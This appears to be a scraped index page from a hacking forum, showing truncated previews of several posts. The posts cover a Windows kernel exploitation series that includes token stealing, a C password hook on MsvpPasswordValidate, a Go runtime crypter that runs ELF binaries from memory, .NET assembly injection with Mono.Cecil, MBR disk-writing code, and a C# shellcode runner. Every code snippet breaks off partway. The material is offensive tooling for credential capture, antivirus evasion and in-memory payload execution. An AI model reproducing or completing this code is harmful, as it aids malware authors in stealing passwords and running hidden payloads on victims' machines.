|
Author: SWaNk - Replies: 0 - Views: 2489
Starting with Windows Kernel Exploitation
|
Starting with Windows Kernel Exploitation Based on HackSysExtremeVulnerableDriver
Part 1 – setting up the lab
Part 2 – getting familiar with HackSys Extreme Vulnerable Driver
Part 3 – stealing the Access Token
Links:
[hide]
[url=https://hshrzd.word
|
[Windows] Password Hooking with MsvpPasswordValidate
|
[hide]
PasswdHook.c
[code]#include "common.h"
static
BOOLEAN
MsvpPasswordValidate( BOOLEAN UasCompatibilityRequired,
NETLOGON_LOGON_INFO_CLASS LogonLevel,
PVOID LogonInformation,
PUSER_INTERNAL1_INFORMATION Passwords,
PULONG UserFlags,
PUSER_SESSION_KEY UserSessionKey,
PVOID LmSessionKey
)
{
return ((FnMsvpPasswordValidate)g_MsvpPasswordValidate)(
UasCompatibilityRequired,
LogonLevel,
LogonInformation
|
Author: TMZ - Replies: 0 - Views: 3288
Ezuri: Linux runtime crypter with memfd_create
|
A small Golang runtime crypter demonstrating memfd_create syscall usage to run ELF executables from memory in Linux. Works on kernel versions >= 3.17 (relies on the memfd_create syscall).
aes.go
[hide]
[code]
package main
import (
"crypto/aes"
"crypto/cipher"
)
func aesEnc(srcBytes []byte, key string, iv string) []byte {
block, err := aes.NewCipher([]byte(key))
check(err)
encrypter := cipher.NewCFBEncrypter(block, []byte(iv))
encrypted := make([]byte, len(srcBytes))
|
Author: TMZ - Replies: 1 - Views: 3003
Injection with Mono.Cecil
|
This may not be news for everyone but I find it interesting. Mono.Cecil is an impressive work and can provide a lot of cool features such as runtime .NET assembly manipulation. We can inject opcodes (IL instructions) into a target assembly, transforming it as we wish. Here’s the test scenario:
A dummy C# application like the one below, compile it to get its executable file, that’s what we need:
[hide]
[code]
using System;
namespace Dummy
{
class Program
{
public static v
|
Author: TMZ - Replies: 0 - Views: 2754
MBR Dump With .NET
|
Years ago I was messing around with Windows MBR (on VXHeaven) and got stuck while trying to write a modified copy back to the disk.
[hide]
[code]
using System;
using System.Runtime.InteropServices;
using Microsoft.Win32.SafeHandles;
using System.IO;
namespace MBR
{
class MainClass
{
[DllImport("Kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
static extern uint SetFilePointer(
[In] SafeFileHandle hFile,
[In] int lDistanceToMove,
[Out] out int lpDis
|
Shellcode execution with C#
|
Your shellcode has to be pasted in C++ format: { 0xDE, 0xAD, 0xBE, 0xEF }
[hide]
[code]
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
namespace Net_Shellcode_Execution
{
class Program
{
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32")]
private static extern
|